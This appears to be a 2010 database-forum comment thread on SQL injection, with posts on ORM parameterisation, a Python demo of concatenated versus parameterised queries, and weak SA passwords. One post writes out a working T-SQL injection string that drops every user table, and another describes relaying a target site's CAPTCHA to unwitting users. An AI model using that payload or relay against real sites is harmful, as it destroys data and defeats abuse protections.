April 20, 2010 at 5:43 pm
Topic 1:
I hardly dare mention it after the flogging ORMs got a week or so ago, but as a frequenter of the site probably with a foot planted more firmly on the application development side than most, I have to comment that one excellent side effect of a 'wrapper' tool is to prevent SQL injection.
I use SubSonic, as it provides full automated object wrapper generation (with partial class customisation), as well as being as non-prescriptive as possible with regard to SQL. For example, you can embed pure SQL (NOT in linq-ised style, the real stuff) into it as a query, BUT to run it, you need to pass any parameters to the execution function and this safely handles them for you. It gives you pretty much all the freedom of writing freeform SQL, while guarding against vulnerable code, and the bonus of saving stacks of time by handling all the minutiae and giving full object wrapping.
Not that I want to get into the business of whether you SHOULD embed SQL in an ORM, but Subsonic takes the approach that whether you do or not is your call, and it gives you as much freedom as possible to build it the way you want.
Believe me, all ORMs are NOT the same.
Topic 2:
The photo reminds me of another excellent exploit I read about.
The person was getting around CAPTCHA on a target site by copying the CAPTCHA image, then dishing the same image up as a CAPTCHA check to users registering for an account on a site under their control, taking the user response (without being able to check correctness, but you'd think 80% or so correct), then feeding the answer back to the target site requiring the CAPTCHA check.
The controlled site was busy enough that they could do this in realtime, and feed the response back to the target site before timeout. Ingenious.
It's just such a bummer that they didn't even have an interthingy back in my 15-year-old-assembly-code hacker days. Doh!
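To illustrate the point in Topic 1 about passing parameters to the execution function instead of splicing them into the SQL text, here is an added example (not code from this thread and not SubSonic's own API) using Python's sqlite3 module; the table, the rows and the tautology input are constructed for the demo.

```python
import sqlite3

# Constructed sample data (not from the thread): three users.
SAMPLE_USERS = [("alice", "alice@example.com"),
                ("bob", "bob@example.com"),
                ("carol", "carol@example.com")]


def make_db():
    """Build an in-memory table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_concat(conn, name):
    """The 'before': user input is spliced into the SQL text, so the
    database parses whatever the caller typed as part of the query."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn, name):
    """The 'after': the SQL text is fixed at write time; the value travels
    separately as a bound parameter and can only ever be compared as data."""
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def demo():
    """Run both lookups on a constructed tautology input.

    Returns (rows from the concatenated query, rows from the parameterised
    query). The concatenated query matches every row because the quote
    closes the literal and the OR is parsed as SQL; the parameterised query
    matches nothing because no user is literally named that string."""
    conn = make_db()
    tautology = "x' OR '1'='1"  # constructed input, not a real name
    return len(lookup_concat(conn, tautology)), len(lookup_param(conn, tautology))


if __name__ == "__main__":
    print(demo())  # (3, 0)
```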
April 20, 2010 at 5:44 pm
Naked Ape (4/19/2010)
That's thinking outside the square - even as a developer/SQL-admin, I have to admire his ingenuity.😛
I agree 100% - I love this. The Geek Shall Inherit the Earth!!
James Stover, McDBA
April 20, 2010 at 10:08 pm
I'm going to legally change my name to this:
');declare @ nvarchar(max);set @='';select @=@+'drop table '+quotename(object_schema_name(id))+'.'+quotename(name)+';' from sysobjects where xtype ='u';exec (@); --
Hope SSC has its input sanitized. 🙂
April 20, 2010 at 11:37 pm
Michael Valentine Jones (4/20/2010)
');declare @ nvarchar(max);set @='';select @=@+'drop table '+quotename(object_schema_name(id))+'.'+quotename(name)+';' from sysobjects where xtype ='u';exec (@); --
Too bad; if anybody tried your "Injection", then .... !!! :-D
April 22, 2010 at 9:32 am
Or hope we have good backups! :w00t::hehe:
Please don't try that, Michael. I suspect there are holes in what my devs built.
April 22, 2010 at 10:15 am
Steve Jones - Editor (4/22/2010)
Or hope we have good backups! :w00t::hehe:
Please don't try that, Michael. I suspect there are holes in what my devs built.
I won't, I have a new, improved version.
I'm not posting it. I probably shouldn't have posted the other one; I'd hate to find out some idiot actually used it.
April 22, 2010 at 1:26 pm
Michael Valentine Jones (4/22/2010)
Steve Jones - Editor (4/22/2010)
Or hope we have good backups! :w00t::hehe:
Please don't try that, Michael. I suspect there are holes in what my devs built.
I won't, I have a new, improved version.
I'm not posting it. I probably shouldn't have posted the other one; I'd hate to find out some idiot actually used it.
I agree... you could go back and edit it out so some whacko doesn't have a new tool.
--Jeff Moden
Change is inevitable... Change for the better is not.
July 27, 2010 at 2:26 pm
Interesting editorial, Steve, and fab picture.
I suspect that SA with a blank password, default instance, DBMS on the same server as the website and set up to use default port numbers, combined with a firewall that allows the default SQL ports so that 3rd-line support can get in to fix problems, is both (1) a more common security hole than being open to injection attacks and (2) permits even nastier things to happen (only if the website connects to the DB with SA privileges will injection be able to be quite as bad as wide open SA access).
It's good to remind everyone that security matters, so the editorial isn't just interesting but good and useful too.
Tom
July 27, 2010 at 2:52 pm
Thanks, glad you enjoyed it.
It does seem that there are lots of holes out there that are just let go by companies/people without thinking about the wider issues. Hopefully someone made a change based on this to be more secure.